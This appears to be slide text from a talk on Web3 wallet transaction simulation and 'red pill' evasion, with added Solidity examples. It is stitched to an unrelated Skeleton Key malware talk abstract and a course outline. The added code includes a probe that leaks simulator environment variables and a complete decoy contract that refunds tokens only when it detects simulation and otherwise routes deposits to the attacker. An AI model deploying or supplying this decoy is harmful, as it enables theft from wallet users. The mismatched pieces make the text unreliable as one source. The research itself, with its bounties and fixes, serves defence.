Earlier this year, Dell Secureworks had shared a report on an advanced attack campaign utilizing a dedicated DC malware, named “Skeleton Key” Malware. The Skeleton Key malware modifies the DC behavior to accept authentications specifying a secret ”Skeleton key” (i.e. “master key”) password, thus enabling the attackers to login from any computer as any domain user without installing any additional malware while keeping the original users’ authentication behavior.
In this talk, we will explore the unique interaction between such malware functionality and the Kerberos authentication protocol, with a special emphasis on its manifestation in network traffic. We will also share a script that implements remote detection of the Skeleton Key malware functionality.
The talk was given on TCE2015 summer school, Technion, Israel
7. Blockchain: In a nutshell
● “Just” a distributed database
○ Reaching a consensus on conflicts is not trivial!
● Messages are authenticated
○ User address corresponds to a public key
○ User signs messages with a private key
○ Private key stored in a wallet
● Very useful for value transfer = digital money!
● Bitcoin (2009) is doing that:
○ “1 built-in program”: “Send(source,dest,amount)”
■ Check authenticity by verifying the user’s signature on the transaction
■ Add amount to dest, subtract amount from source
■ Results are saved in the blockchain
9. Blockchain: beyond sending money
● Ethereum, co-founded by Vitalik (2015)
○ Has a similar “1 built-in program” for money transfer
○ But also, allows users to upload custom code (smart contract) and interact with it
■ Smart contracts are uploaded into addresses
■ Smart contracts expose callable methods
■ Very similar to a dynamic library (“.dll”, “.so”)
○ When interacting with a contract
■ Destination address is the contract
■ The function selector (the first 4 bytes of keccak256 of the function signature) and the ABI-encoded call parameters are passed in the transaction’s data field (calldata)
■ Network fee (“gas”) depends on the complexity of the execution
11. Ethereum Apps: Tokens (ERC20)
● Before:
○ if you wanted your own coin, you needed to create your own blockchain
● After:
○ You just need to implement a smart contract that supports 6 methods (and 2 events)
12. Software eats world: DeFi “Money Lego”
● ERC20 is a standard, so dev developed standard services
○ Exchange in smart contract: DEX
○ Deposits / Loans
○ Derivatives
● Composability
○ Everything is just a function call
○ You can make an app to “mix and match”
■ Example “swap + deposit” app
● Finds the best interest rate for coin
● Switches user coin to it and deposits
13. Ethereum Apps: NFTs
● Current leading use case “Funny JPEGs”
● In future, also more serious use cases: registries, fractional ownership
● All you need to do is to implement 9 functions (and 3 events)
14. NFT in the wild
● The user owns NFTs
○ Ownership is public on blockchain
○ User can transfer via wallet
● Multiple marketplaces
○ For example: Opensea, rarible
17. How can user consume apps?
● (Most) Users cannot interact directly with smart contracts
○ We need to provide UI for this new system
○ We need to tell the wallet what to sign
● We already solved similar problems with Web
● Let’s repurpose Web2 to work with blockchain!
24. ZenGo 💕 Ethereum and Web3
● Ethereum supported since day 1
○ Polygon added
● ClearSign:
○ Web3 first firewall integrated into the wallet
● Native tokens support
○ ERC20
○ NFTs gallery
● Ethereum Foundation grant
● Security research
○ Including this talk! :)
27. Ethereum: The most(?) secure execution env!
● Trusted execution is a hard problem
○ Integrity of data and code
○ Consider malware, HW supply chain, Operating system supply chain
● Usually “solved” in hardware: SGX, TEE, etc.
● Ethereum
○ Code and inputs are on chain
○ Execution is independently validated by multiple validators
● In Ethereum an attacker would need to compromise the majority of validators to compromise a computation!
● Implicit bug bounty of $200B
● More on this: zengo.com/wagmi-web3-will-be-more-secure-than-web2/
28. If it’s so good, how come it’s so bad?
● If Web3 is so secure, how come there are so many hacks and money loss cases?
29. Answer: because humans make mistakes
● The program (code + input) is executed perfectly, but either the code or the input (or both) is malicious!
30. Attack scenario #1: Malicious user
● The program (code + input) is executed perfectly, but
○ The smart contract’s code has vulns
○ A malicious user sends maliciously crafted inputs to exploit them
● Not going to discuss that today
31. Attack #2: Malicious web2 interface
● The program (code + input) is executed perfectly, but:
○ The input is bad for the user
■ Input is suggested by a malicious dapp
● Definitely going to discuss that today
32. Attack #3: Malicious code
● The program (code + input) is executed perfectly, but:
○ The code is malicious
● Definitely going to discuss that today
33. Malicious interfaces in the wild: BadgerDAO
● “Bringing Bitcoin to DeFi” : Earn interest on your BTC
○ via ERC20
34. BadgerDAO hack: injected code to web interface
● BadgerDao web interface infected with injected code
○ [Nov 2021] first version injected
○ Captured by web.archive.org
○ De-obfuscated by ZenGo
● Code Diff (The injected website is in red on left)
35. BadgerDAO: who is the $50M fish?
● According to press
○ Celsius
○ Using MetaMask
36. BadgerDAO: IncreaseAllowance vs. Approve
● Usually an ERC20 funds-access request is made with approve()
● The attackers used a lesser-known method, increaseAllowance()
○ Not part of the ERC20 standard (an OpenZeppelin extension), but it sets the allowance just the same
● MetaMask (MM) did not recognize increaseAllowance()
○ No humanly understandable explanation
○ Did not show the user that they were interacting with an ERC20 contract
37. Malicious Smart Contracts in the wild
● The truth is this danger is fairly limited
● A bad contract can only touch the Ether sent along with the call
○ Smart contract based assets (tokens, NFTs) require an approve() first (as before)
● Ether sending is visible in the transaction itself
○ It is Ethereum’s “1 built-in program” for money transfer: the value field, not contract code
● Still, there could be scams like
○ Give $10 in ETH to get $200 in ERC-20
38. Is execution (code + input) malicious or benign?
● Visibility is the key:
● Users need to know, before they sign a transaction, what the outcome of sending these RPC parameters to the contract would be
● We can try to analyze the code
○ CS theory tells us this problem is undecidable in general (Rice’s theorem)
● However, antivirus has been dealing with this issue for decades
○ VM / sandbox / detonation chamber
● Instead of analyzing what the program does, let’s just execute it in a sandboxed environment!
● And then apply some security logic to the result
40. Ethereum is a state machine
● EVM is the runtime environment for smart contract in Ethereum
41. EVM opcodes
● Predefined instructions
● Smart contracts are written in high-level languages (e.g. Solidity) and compiled down to EVM opcodes (bytecode)
● Execution is initiated by a transaction
42. Special variables in the EVM
● Not part of the “regular state”, by definition
○ Some of them are controlled by the user
○ Some of them are “global” variables
● Runtime environment variables:
○ COINBASE - the Account which is going to get the current block fee rewards
○ GASPRICE - Transaction’s gas price
○ BASEFEE - EIP1559 block’s basefee
45. Are we ready to simulate? Not yet!
● The problem:
○ We can execute a smart contract and observe state changes, but how can we explain them to the user?
○ State changes are hard to explain
● Solution:
○ Events to the rescue!
46. Ethereum events
● Emitted by smart contracts during execution (the LOG opcodes)
○ Generated on-chain
○ Stored in transaction receipts, not in contract state: they cannot be read by smart contracts
● Frequently used by off-chain services
● Any contract can emit any event (the event signature is just a topic hash; nothing binds it to a real token)
● Can we trust events?
○ We can trust good Smart Contract events, as they are intended to represent a real on-chain state change
47. Common events in ERC20 and ERC721 (NFTs)
● Approval events
○ Emitted every time the token owner allows another address to access their tokens
■ In ERC721: Approval for a single token, ApprovalForAll for all the tokens within the collection
■ In ERC20: Approval with a specific amount of tokens
● Transfer events
○ Emitted every time a token is transferred from one address to another
48. Simulation flow
1. The transaction is simulated
○ The events it would emit are shown to the user
2. Based on the events, the user decides whether to reject or continue the transaction
3. The transaction is broadcast to the blockchain
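To make slides 36, 47 and 48 concrete, here is an added example in Solidity (it is not code from the talk, from BadgerDAO or from any wallet): a minimal ERC20 allowance implementation in which approve() and the non-standard increaseAllowance() both grant a spender access to the owner's funds and both emit the same Approval event. A wallet that keys on function selectors and only knows approve() (0x095ea7b3) misses increaseAllowance() (0x39509351); a wallet that simulates the call and reads the emitted events sees the same Approval either way. The contract name and the constructor argument are illustrative choices.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

/// Minimal ERC20 token: only the pieces needed to show that an allowance
/// grant is the same state change (and the same event) whichever method
/// the dapp calls. Not a full ERC20 implementation.
contract MinimalToken {
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(address indexed owner, address indexed spender, uint256 value);

    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;

    constructor(uint256 supply) {
        balanceOf[msg.sender] = supply;
        emit Transfer(address(0), msg.sender, supply);
    }

    /// Standard ERC20 method, selector 0x095ea7b3.
    function approve(address spender, uint256 amount) external returns (bool) {
        allowance[msg.sender][spender] = amount;
        emit Approval(msg.sender, spender, amount);
        return true;
    }

    /// Not in the ERC20 standard (OpenZeppelin extension), selector 0x39509351.
    /// Equally dangerous: it ends in the same storage slot and the same event.
    function increaseAllowance(address spender, uint256 added) external returns (bool) {
        uint256 newAllowance = allowance[msg.sender][spender] + added;
        allowance[msg.sender][spender] = newAllowance;
        emit Approval(msg.sender, spender, newAllowance);
        return true;
    }

    /// Why an allowance is "funds access": the spender moves the owner's
    /// tokens later, in a transaction the owner never signs.
    function transferFrom(address from, address to, uint256 amount) external returns (bool) {
        uint256 allowed = allowance[from][msg.sender];
        require(allowed >= amount, "insufficient allowance");
        if (allowed != type(uint256).max) {
            allowance[from][msg.sender] = allowed - amount;
        }
        _move(from, to, amount);
        return true;
    }

    function transfer(address to, uint256 amount) external returns (bool) {
        _move(msg.sender, to, amount);
        return true;
    }

    function _move(address from, address to, uint256 amount) internal {
        require(balanceOf[from] >= amount, "insufficient balance");
        balanceOf[from] -= amount;
        balanceOf[to] += amount;
        emit Transfer(from, to, amount);
    }
}
```

Simulating a call to increaseAllowance(spender, type(uint256).max) against this contract produces an Approval(owner, spender, 2^256-1) log, which is exactly what step 1 of the simulation flow above shows the user; the method name never needs to be recognized, only the event.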
52. Red Pills exploit: A blueprint
● Find a red pill predicate
○ Am I in a simulation now?
● If in simulation
○ Show benign behavior
● If in non-simulation
○ Attack!
[Diagram: simulation? / non-simulation?]
53. Red Pills in Cyber Security
● Traditional Red pills:
○ Malware Vaccination tricks:
■ VM detection
■ isDebuggerPresent
■ SandBox detection
● Web3 Security Red Pills:
○ Malicious smart contract:
■ Can it be aware it runs in simulation?
54. Web3 Red Pills hypothesis: Special variables
● In the real environment they are naturally provided by:
○ The user - the user specifies variables (e.g. gas limit, gas price)
○ The environment - e.g. the block base fee, COINBASE
● However, in simulation:
○ They are generated by the simulation node provider
● Almost any value is technically valid, however not every value is “reasonable”
● Maybe these are our Red Pills?
55. Validating the hypothesis
● To validate, we need to see the values of the special variables inside the simulation
● Challenge: simulation products are black boxes
○ They only show the simulation results (decoded events, balance changes)
● Solution: use the standard events the simulators already decode as a debugging channel!
○ Transfer events have a fixed signature (address, address, uint256), so each value must be packed into those fields
○ Values are recovered byte by byte from the decoded output
○ Solidity casts (e.g. uint160 -> address) fit each variable into a field
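As an added illustration (this editor's code, not the probe contract used in the research), the Solidity contract below packs each EVM special variable into the fields of a standard ERC20 Transfer event so that a black-box simulator's decoded output reveals them. It assumes the simulator decodes and displays any Transfer(address,address,uint256) event with addresses rendered as raw hex; the tag numbers and the split of a 256-bit word across the two address fields are conventions chosen here, not a standard.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example (editor's illustration, not code from the talk): leak the EVM
// special variables through standard ERC20 Transfer events.
// Assumption: the simulator decodes every Transfer(address,address,uint256)
// it sees and shows the address fields as raw hex, while the `value` field
// may be rendered as a rounded token amount.
contract EnvProbe {
    // Exactly the ERC20 Transfer signature; other signatures may be ignored
    // by the simulator's decoder.
    event Transfer(address indexed from, address indexed to, uint256 value);

    // Tags identifying which variable a given event row carries
    // (arbitrary values, our own convention).
    uint160 private constant TAG_COINBASE   = 0x01;
    uint160 private constant TAG_ORIGIN     = 0x02;
    uint160 private constant TAG_GASPRICE   = 0x03;
    uint160 private constant TAG_GASLIMIT   = 0x04;
    uint160 private constant TAG_BASEFEE    = 0x05;
    uint160 private constant TAG_NUMBER     = 0x06;
    uint160 private constant TAG_TIMESTAMP  = 0x07;
    uint160 private constant TAG_CHAINID    = 0x08;
    uint160 private constant TAG_PREVRANDAO = 0x09;
    uint160 private constant TAG_GASLEFT    = 0x0a;

    // 160-bit values (addresses) fit the `to` field as-is; the tag goes in `from`.
    function leakAddress(uint160 tag, address v) internal {
        emit Transfer(address(tag), v, 0);
    }

    // 256-bit values: first emit the full word in `value` (tag in `from`),
    // then split the same word across the two address fields (high 96 bits
    // in `from`, low 160 bits in `to`, tag in `value`) so the exact bytes
    // survive even if the UI rounds `value` as a token amount.
    function leakWord(uint160 tag, uint256 v) internal {
        emit Transfer(address(tag), address(0), v);
        emit Transfer(address(uint160(v >> 160)), address(uint160(v)), uint256(tag));
    }

    // Simulating (or sending) a call to probe() dumps every variable the talk
    // lists as a potential red pill, plus a few more for comparison.
    function probe() external {
        leakAddress(TAG_COINBASE, block.coinbase);
        leakAddress(TAG_ORIGIN, tx.origin);
        leakWord(TAG_GASPRICE, tx.gasprice);
        leakWord(TAG_GASLIMIT, block.gaslimit);
        leakWord(TAG_BASEFEE, block.basefee);
        leakWord(TAG_NUMBER, block.number);
        leakWord(TAG_TIMESTAMP, block.timestamp);
        leakWord(TAG_CHAINID, block.chainid);
        leakWord(TAG_PREVRANDAO, block.prevrandao);
        leakWord(TAG_GASLEFT, gasleft());
    }

    // Same arithmetic an off-chain script applies to the two decoded address
    // fields of a split row to rebuild the original 256-bit word.
    function reassemble(address hi, address lo) external pure returns (uint256) {
        return (uint256(uint160(hi)) << 160) | uint256(uint160(lo));
    }
}
```

Simulating a call to probe() in the wallet under test yields one decoded row per variable; rows are matched to variables by tag, and reassemble(hi, lo) shows how a split word is put back together. A row where COINBASE decodes to the null address or GASPRICE to 0 is exactly the kind of unreasonable value the research was looking for.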
56. Bingo!
● Applying the technique we were able to:
○ Easily dump every environment variable of any provider
○ Search for unreasonable values
● Some unreasonable values found:
○ COINBASE always the null address (0x000000…000)
○ GASPRICE always 0
○ GASLIMIT always a constant, extremely high value
● Once we discover an unreasonable value provided by a simulation vendor:
○ We can create a "red pill" predicate for it:
■ If in simulation, show a good trade
■ If not in simulation, just take the money
● And finally, deploy a dedicated exploit contract for every vendor
57. Exploit example: COINBASE null address
● Red pill predicate
○ Is COINBASE == 0?
● Exploit
○ Tricks the user into signing, based on what the simulation shows:
■ In simulation, the contract sends the ERC20 tokens back
■ On chain, it does not!
60. Bounties, Grants
● Bounties:
○ Coinbase wallet
○ Rabby wallet
● Grants:
○ From the Ethereum Foundation: https://zengo.com/ethereum-foundation-awards-zengo-a-grant-for-web3-security-research/
61. How to fix
● Use the REAL environment variables from the current chain state
○ That way a malicious contract can no longer differentiate simulation from execution
● Some of them should be taken from the user's transaction:
○ GASPRICE
○ GASLIMIT
● Some of them aren't known yet at simulation time:
○ COINBASE - use the last block's value (the same COINBASE may appear in consecutive blocks on-chain, so it is a plausible value)
62. Cat and Mouse - TOCTOU
● Simulating the transaction and then having the user confirm it takes time
● A malicious application can leverage that gap:
○ The dapp records the block number (or timestamp) when the transaction was crafted and embeds it in the calldata
○ The contract checks how much time has elapsed since then
● Red pill predicate
○ Is blockDiff > X? (a long gap means a real broadcast, not a simulation)
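As an added, editor-written example (not the exploit deployed in the research, which targeted one vendor's leak at a time), the Solidity decoy below combines the environment-variable red pills from the COINBASE exploit example with the TOCTOU red pill from this slide. The "deposit to get a bonus" story, the contract name, the gas-limit threshold and the value of X are assumptions chosen for illustration.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

interface IERC20 {
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
    function transfer(address to, uint256 amount) external returns (bool);
}

// Added example (editor's illustration, not the research's exploit contract):
// a decoy that behaves honestly whenever a red pill predicate says it is being
// simulated and drains the deposit otherwise.
contract RedPillDecoy {
    IERC20 public immutable token;
    address private immutable attacker;

    // Tuning knobs (assumed values): the mainnet block gas limit has been in
    // the tens of millions, and a wallet user needs more than a couple of
    // blocks to read a simulation result and press "confirm".
    uint256 public constant UNREASONABLE_GASLIMIT = 100_000_000;
    uint256 public constant MAX_SIMULATION_LAG_BLOCKS = 2; // the slide's X

    constructor(IERC20 _token) {
        token = _token;
        attacker = msg.sender;
    }

    // --- Environment-variable red pills (unreasonable values from slide 56) ---

    // A real block always has a fee recipient; some simulators leave it 0x0.
    function coinbaseRedPill() public view returns (bool) {
        return block.coinbase == address(0);
    }

    // A real mainnet transaction pays a non-zero gas price (at least the base fee).
    function gaspriceRedPill() public view returns (bool) {
        return tx.gasprice == 0;
    }

    // A simulator that pads GASLIMIT to a constant huge value gives itself away.
    function gaslimitRedPill() public view returns (bool) {
        return block.gaslimit > UNREASONABLE_GASLIMIT;
    }

    // --- TOCTOU red pill (slide 62) ---

    // `craftedAtBlock` is the chain head the dapp front end observed when it
    // built the calldata (assumption: read via eth_blockNumber). Simulation
    // runs right away, so blockDiff is about 0; the real broadcast happens
    // only after the user has reviewed the result and confirmed.
    function toctouRedPill(uint256 craftedAtBlock) public view returns (bool) {
        uint256 blockDiff = block.number > craftedAtBlock ? block.number - craftedAtBlock : 0;
        return blockDiff <= MAX_SIMULATION_LAG_BLOCKS;
    }

    // Combined predicate. A real attacker picks the leak of the vendor being
    // targeted (a dedicated contract per vendor); OR-ing them here shows that
    // the timing pill survives a vendor fixing its environment variables.
    function inSimulation(uint256 craftedAtBlock) public view returns (bool) {
        return coinbaseRedPill() || gaspriceRedPill() || gaslimitRedPill()
            || toctouRedPill(craftedAtBlock);
    }

    // "Deposit tokens to claim your bonus." Requires a prior approve() by the
    // victim. In simulation the wallet sees a harmless round trip: tokens out,
    // the same tokens straight back. On chain the refund never happens.
    function deposit(uint256 amount, uint256 craftedAtBlock) external {
        require(token.transferFrom(msg.sender, address(this), amount), "pull failed");
        address recipient = inSimulation(craftedAtBlock) ? msg.sender : attacker;
        require(token.transfer(recipient, amount), "payout failed");
    }
}
```

The wallet's simulation of deposit() shows tokens leaving and immediately returning, while the on-chain execution pays the attacker, unless the user confirms within MAX_SIMULATION_LAG_BLOCKS blocks, in which case the on-chain run is harmless too. The fix of using real environment variables removes only the first three predicates; toctouRedPill() keeps working as long as the simulation runs against a different block than the final broadcast, which is what makes this a cat-and-mouse game.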
65. Takeaways
● Web3 enables decentralized apps with thrilling use cases
● However, it creates new attack surfaces:
○ Rogue contracts
○ Rogue interfaces
● Users have no visibility into what they are signing!
● You cannot fight what you cannot see
● Transaction simulation provides that visibility
○ But it has limitations and can be attacked
■ Red pills!
● Transaction simulation should be implemented securely
● With this new visibility, Web3 firewalls can save the users!
What is blockchain [20 mins]
Distributed database
Private key, public key, signing, address, transaction
MPC in a nutshell
Fees
Explorers
Ethereum [25 mins]
Ethereum vs. Bitcoin
Smart contracts and apps:
ERC20
NFTs
DeFi
Web3 and WalletConnect
Web3 security in a nutshell
Other chains [5 mins]
Honorable mentions for chains ZenGo supports / supported / will support: Tezos, Dogecoin, Terra, Binance, Solana
Layer 2
Team [5 mins]
Research team - areas of research: Blockchain, Security, Cryptography and MPC
people